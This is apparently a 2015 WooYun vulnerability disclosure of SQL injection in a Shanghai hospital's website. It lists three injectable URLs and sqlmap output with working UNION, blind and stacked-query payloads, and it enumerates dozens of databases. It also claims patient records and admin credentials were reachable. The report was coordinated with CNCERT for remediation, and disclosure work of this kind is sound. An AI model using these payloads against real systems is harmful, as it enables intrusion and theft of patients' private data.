当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103770

漏洞标题:上海市某医院网站多处SQL注入,大量病人信息泄露

相关厂商:上海瑞金医院

漏洞作者: 路人甲

提交时间:2015-03-27 10:39

修复时间:2015-05-15 11:24

公开时间:2015-05-15 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

RT

详细说明:

注入点
1、

http://www.rjh.com.cn/rjhsearch/Pages/Detail.aspx?yggh=J9418


2、

http://www.rjh.com.cn/RUIJIN_Portal_ClickCount_WebSite/ClickOrder.aspx?PortalType=rjh


3、

http://www.rjh.com.cn/mzynjbapp/Expert/OfficeList.aspx?OfficeID=4160000

漏洞证明:

以第一个为例:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: yggh
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: yggh=J9418' AND 5506=5506 AND 'YGzo'='YGzo
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: yggh=J9418' UNION ALL SELECT NULL,NULL,NULL,CHAR(58) CHAR(119) CHAR(103) CHAR(114) CHAR(58) CHAR(76) CHAR(104) CHAR(89) CHAR(77) CHAR(115) CHAR(115) CHAR(104) CHAR(100) CHAR(115) CHAR(77) CHAR(58) CHAR(116) CHAR(98) CHAR(113) CHAR(58),NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: yggh=J9418'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: yggh=J9418' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [28]:
[*] CMS2003
[*] crf
[*] Forums
[*] HIS
[*] hytz
[*] IntraForums
[*] LWPortalDB
[*] LWportalSite
[*] LWXQSL
[*] LZX_hytz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] OGManagement
[*] PharmForums
[*] PortalASPDB
[*] pubs
[*] rj_pxb
[*] RJPortalDB
[*] rjyy_jyk
[*] RuijinOA
[*] SPS01_Config_db
[*] tempdb
[*] webdbdns,1434
[*] 瑞金内网门户1_PROF
[*] 瑞金内网门户1_SERV
[*] 瑞金内网门户1_SITE


其中“RJPortalDB”数据库中“RJGH_User”表中含有大量病人信息

QQ截图20150325221632.png


具体数据都不深入了。。
其中“crf”数据库中可以爆出管理员账号密码,顺利登入后台

QQ截图20150325221446.png


Ps:第二个注入点可以爆出99个数据库

available databases [99]:
[*] ChuKeAssessment
[*] db_ExamOnline
[*] EndocrineQuestionnaire
[*] EndocrineQuestionnaire_JS
[*] ExcellentManagerApply
[*] FORMDB
[*] Forum
[*] HF_HRDB
[*] HIS_JBDM_DB
[*] HR_ExcellentYouthAssessment
[*] HR_PerformanceAssessment
[*] HR_WageQuery
[*] HRDB
[*] HRDB_LOG
[*] IntertidCMS
[*] IntertidPermissions
[*] IntertidWebApp
[*] master
[*] model
[*] msdb
[*] OA_AbroadRequest
[*] OA_AdvanceRequest
[*] OA_APPDB
[*] OA_ArchiveList
[*] OA_AudioVisual
[*] OA_Budget
[*] OA_ClinicalReimbursement
[*] OA_ClinicScheduling
[*] OA_CommunistPartyMemberManage
[*] OA_ConsultRequest
[*] OA_CPDCirculation
[*] OA_DoctorSelectCourse
[*] OA_DoctorsScheduling
[*] OA_DonateApprove
[*] OA_EndocrineDataMaintain
[*] OA_EndocrineResearchManagement
[*] OA_EnrytSystem
[*] OA_EthicExam
[*] OA_GuardSafetyManagement
[*] OA_HospitalScheduling
[*] OA_HREvaluation
[*] OA_HRNEEvaluation
[*] OA_Infection
[*] OA_MiniApplication
[*] OA_NursePapers
[*] OA_NurseScheduling
[*] OA_NurseSelectCourse
[*] OA_NursingIncidentReport
[*] OA_OnlineTraining
[*] OA_OutApprove
[*] OA_OutWorkingRequest
[*] OA_PersonModule
[*] OA_Platform
[*] OA_PSApplication
[*] OA_Reimbursement
[*] OA_Resignation
[*] OA_Satisfaction
[*] OA_StudentSelectCourse
[*] OA_Survey
[*] OA_SurveyLead
[*] OA_Task
[*] OA_Task135
[*] OA_TeachingAssessment
[*] OA_Unions
[*] OA_Vote
[*] Portal_Application
[*] PS_Conference
[*] PS_Contact
[*] PS_EmsSms
[*] PS_ExchangeApp
[*] PS_Framework
[*] PS_LogService
[*] PS_Monitor
[*] PS_Portal
[*] PS_SchedulingService
[*] PS_SecurityService
[*] PS_Task
[*] PS_Workflow
[*] Questionnaire
[*] ReportServer
[*] ReportServerNew
[*] ReportServerNewTempDB
[*] ReportServerTempDB
[*] ReservationPlatform
[*] RJCRMAPPDB
[*] RJDJDNT
[*] RJOA
[*] RJWZ
[*] RJWZCY
[*] RSSDB
[*] ruijinCMS2010
[*] RuijinHRApplication
[*] RuijinResume_WUXI_FYJ
[*] RuijinResume_WUXI_YJ
[*] ServicePlatform
[*] tempdb
[*] Test
[*] TNBDCWJ
[*] VolunteerServiceCenter


其中数据肯定很多。。。就不深入了

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-31 11:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论